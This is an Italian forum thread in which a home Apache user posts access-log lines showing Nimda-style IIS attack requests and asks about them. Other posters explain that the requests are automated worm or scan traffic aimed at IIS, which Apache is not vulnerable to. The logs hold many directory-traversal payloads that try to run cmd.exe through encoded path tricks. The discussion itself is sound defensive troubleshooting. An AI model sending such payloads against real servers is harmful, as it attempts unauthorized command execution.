attacco hackers????

**Ratatuia** · 21-01-2003, 08:47

questa notte ho lasciato acceso il mio apache sul computer per lasciar scaricare un file...oltre all'ip di questo mio amico che ha scaricato il file, ci sono altri ip (uno tedesco,uno italiano, uno spagnolo) con chiamate a funzioni di sistema...

vi metto un estratto...

codice:

80.180.42.220 - - [19/Jan/2003:23:41:31 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
80.180.42.220 - - [19/Jan/2003:23:41:34 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
80.180.42.220 - - [19/Jan/2003:23:41:35 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.220 - - [19/Jan/2003:23:41:47 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.220 - - [19/Jan/2003:23:41:50 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.220 - - [19/Jan/2003:23:41:51 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.220 - - [19/Jan/2003:23:41:54 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.220 - - [19/Jan/2003:23:41:54 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
80.180.42.220 - - [19/Jan/2003:23:41:58 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:58 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:58 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:59 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.220 - - [19/Jan/2003:23:41:59 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.220 - - [19/Jan/2003:23:42:02 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.220 - - [19/Jan/2003:23:42:03 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.220 - - [19/Jan/2003:23:42:06 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.190 - - [20/Jan/2003:21:52:13 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
80.180.42.190 - - [20/Jan/2003:21:52:14 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
80.180.42.190 - - [20/Jan/2003:21:52:20 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.190 - - [20/Jan/2003:21:52:24 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.180.42.190 - - [20/Jan/2003:21:52:27 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.190 - - [20/Jan/2003:21:52:28 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.190 - - [20/Jan/2003:21:52:30 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.180.42.190 - - [20/Jan/2003:21:52:32 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
80.180.42.190 - - [20/Jan/2003:21:52:34 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:36 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:38 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:40 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.180.42.190 - - [20/Jan/2003:21:52:42 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.190 - - [20/Jan/2003:21:52:44 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.180.42.190 - - [20/Jan/2003:21:52:46 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.180.42.190 - - [20/Jan/2003:21:52:51 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.132.198.70 - - [21/Jan/2003:01:49:02 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273
80.132.198.70 - - [21/Jan/2003:01:49:04 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 271
80.132.198.70 - - [21/Jan/2003:01:49:06 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.132.198.70 - - [21/Jan/2003:01:49:09 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 281
80.132.198.70 - - [21/Jan/2003:01:49:12 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.132.198.70 - - [21/Jan/2003:01:49:15 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.132.198.70 - - [21/Jan/2003:01:49:18 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312
80.132.198.70 - - [21/Jan/2003:01:49:21 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 328
80.132.198.70 - - [21/Jan/2003:01:49:24 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:27 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:30 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:32 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
80.132.198.70 - - [21/Jan/2003:01:49:35 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.132.198.70 - - [21/Jan/2003:01:49:38 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 278
80.132.198.70 - - [21/Jan/2003:01:49:41 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
80.36.73.35 - - [21/Jan/2003:05:13:20 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 273

vi sono gli estremi x segnalarlo ai servizi di abuse dei rispettivi provider???

ciao
ratatuia

**barney09** · 21-01-2003, 11:39

queste sono le tipiche tracce da NIMDA.

Sono dei worm che si aggiravano circa un anno fa tra i server....
hanno fatto dei grandi macelli ma se il tuo server è aggiornato non hai problemi.

E' inutile denunciare, queste chiamate molto probabilmente sono state fatte in automatico dal sistema infettato.....
e il proprietario del PC molto probabilmente non ne è al corrente.

**Ratatuia** · 21-01-2003, 14:51

il server in questo caso è il mio nel senso che avendo l'adsl ho lasciato attiva la connessione con apache attivo e al mattino ho trovato questo...vuol dire che sono infettato io???

**barney09** · 21-01-2003, 15:03

dipende. Apache è aggiornato?

**barney09** · 21-01-2003, 15:06

che OS usi?

**Ratatuia** · 21-01-2003, 15:10

uso winxp con apache 1.3

**barney09** · 21-01-2003, 15:33

non sono molto informato su Apache.... cerca info su google riguardo NIMDA e Apache troverai sicuramente documenti

**xdesign** · 21-01-2003, 16:00

Potrebbero anche essere scansioni su larga scala.
Ad ogni modo si tratta di un tipo di exploit per IIS, Apache ne è immune

**Ratatuia** · 21-01-2003, 16:04

ho visto...ho fatto una rapida ricerca con google...

Discussione: attacco hackers????

Strumenti discussione

Ricerca discussione

Visualizza

attacco hackers????

Permessi di invio